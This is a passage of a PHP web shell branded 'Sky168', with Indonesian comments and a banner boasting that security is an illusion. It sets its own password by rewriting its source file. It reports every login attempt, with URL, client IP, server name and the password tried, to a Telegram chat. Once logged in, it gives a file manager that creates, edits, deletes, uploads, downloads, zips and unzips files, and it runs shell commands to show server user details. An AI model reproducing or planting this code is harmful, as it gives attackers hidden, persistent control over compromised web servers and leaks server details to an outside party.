TELEGRAM_CHAT_ID,'text'=>$msg,'parse_mode'=>'HTML'];
$opts = ["http"=>[
"header"=>"Content-Type: application/x-www-form-urlencoded\r\n",
"method"=>"POST",
"content"=>http_build_query($data),
"timeout"=>5
]];
@file_get_contents($url,false,stream_context_create($opts));
}
// Fungsi untuk mengganti nilai PASSWORD di file ini
function setPasswordInFile($new_pass){
$file = __FILE__;
$content = file_get_contents($file);
$pattern = "/define\('PASSWORD',\s*'.*?'\);/";
$replacement = "define('PASSWORD', '".$new_pass."');";
$content = preg_replace($pattern, $replacement, $content, 1);
file_put_contents($file, $content);
}
/* ======= AUTH ======= */
if (empty(PASSWORD)) {
if ($_SERVER['REQUEST_METHOD']==='POST' && isset($_POST['new_pass'])){
$new_pass = trim($_POST['new_pass']);
if($new_pass !== ''){
setPasswordInFile($new_pass);
$_SESSION['logged_in'] = true;
$_SESSION['shell_token'] = bin2hex(random_bytes(16));
header('Location: '.$_SERVER['PHP_SELF']); exit;
}
}
echo '
Set Password';
echo ''; exit;
} else {
$current_password = PASSWORD;
if (!is_logged_in()) {
if ($_SERVER['REQUEST_METHOD']==='POST' && isset($_POST['pass'])) {
$input_pass = $_POST['pass'];
if($input_pass === $current_password){
$_SESSION['logged_in'] = true;
$_SESSION['shell_token'] = bin2hex(random_bytes(16));
$urlLogin = (isset($_SERVER['HTTPS'])?'https':'http')."://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$ip = $_SERVER['REMOTE_ADDR'] ?? 'n/a';
$server = php_uname('n');
$msg = "ā
Login Berhasil\nš URL: {$urlLogin}\nš IP: {$ip}\nš„ļø Server: {$server}\nš Password: {$input_pass}\nā° ".date('Y-m-d H:i:s');
sendTelegram($msg);
header('Location: '.$_SERVER['PHP_SELF']); exit;
} else {
$msg_fail = "ā ļø Login Gagal\nš IP: {$_SERVER['REMOTE_ADDR']}\nš Password Dicoba: {$input_pass}\nā° ".date('Y-m-d H:i:s');
sendTelegram($msg_fail);
}
}
echo 'Login';
echo ''; exit;
}
}
/* ===== FILE MANAGER + TERMINAL ===== */
$cwd = isset($_GET['d']) ? realpath($_GET['d']) : ROOT_PATH;
if (!$cwd) $cwd = ROOT_PATH;
if (isset($_GET['logout'])) { session_destroy(); header('Location: '.$_SERVER['PHP_SELF']); exit; }
// Handle actions
if (isset($_POST['newfile'])) file_put_contents($cwd.'/'.basename($_POST['newfile']), '');
if (isset($_POST['newfolder'])) mkdir($cwd.'/'.basename($_POST['newfolder']));
if (isset($_POST['savefile']) && isset($_POST['filename'])) file_put_contents($cwd.'/'.basename($_POST['filename']), $_POST['content']);
if (isset($_GET['delete'])) { $t=$cwd.'/'.basename($_GET['delete']); is_dir($t)?@rmdir($t):@unlink($t); }
if (isset($_GET['download'])) { $f=$cwd.'/'.basename($_GET['download']); if(is_file($f)){header('Content-Type: application/octet-stream');header('Content-Disposition: attachment; filename="'.basename($f).'"');header('Content-Length: '.filesize($f));readfile($f);exit;} }
if (!empty($_FILES['upload']['name'])) move_uploaded_file($_FILES['upload']['tmp_name'], $cwd.'/'.basename($_FILES['upload']['name']));
if (isset($_POST['zip']) && !empty($_POST['files'])){
$zipname=$cwd.'/'.basename($_POST['zip']).'.zip';
$zip=new ZipArchive;
if($zip->open($zipname,ZipArchive::CREATE)===TRUE){
foreach($_POST['files'] as $f){ $p=$cwd.'/'.basename($f); if(is_file($p)) $zip->addFile($p,basename($p)); }
$zip->close();
}
}
if(isset($_POST['unzip'])){
$file=$cwd.'/'.basename($_POST['unzip']);
$zip=new ZipArchive;
if(is_file($file) && $zip->open($file)===TRUE){$zip->extractTo($cwd);$zip->close();}
}
// UI
$user_server = get_current_user();
$whoami = trim(shell_exec('whoami'));
$server_software = $_SERVER['SERVER_SOFTWARE'] ?? 'n/a';
$os_info = php_uname();
echo 'Sky168
';
echo "Sky168 [Keamanan Hanyalah Sebuah Ilusi !!!]
";
echo "š¤ User: {$user_server} ({$whoami})
š„ Server: {$server_software}
š» OS: {$os_info}
";
echo "Logout
";
// Breadcrumb path klik cepat
$pathParts = explode(DIRECTORY_SEPARATOR, $cwd);
$accPath = '';
echo 'Path: ';
foreach ($pathParts as $part) {
if ($part === '') continue;
$accPath .= DIRECTORY_SEPARATOR.$part;
echo "".esc($part)." / ";
}
echo '
';
echo "";
$items = scandir($cwd);
echo "";
?>